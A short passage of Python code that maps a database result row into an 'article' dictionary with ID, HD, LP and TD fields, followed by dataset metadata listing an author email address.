article={'ID':result[0],'HD':result[1],'LP':result[2],'TD':result[3]}
return article
else:
return
| [
"u5976992@anu.edu.au"
] | u5976992@anu.edu.au |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.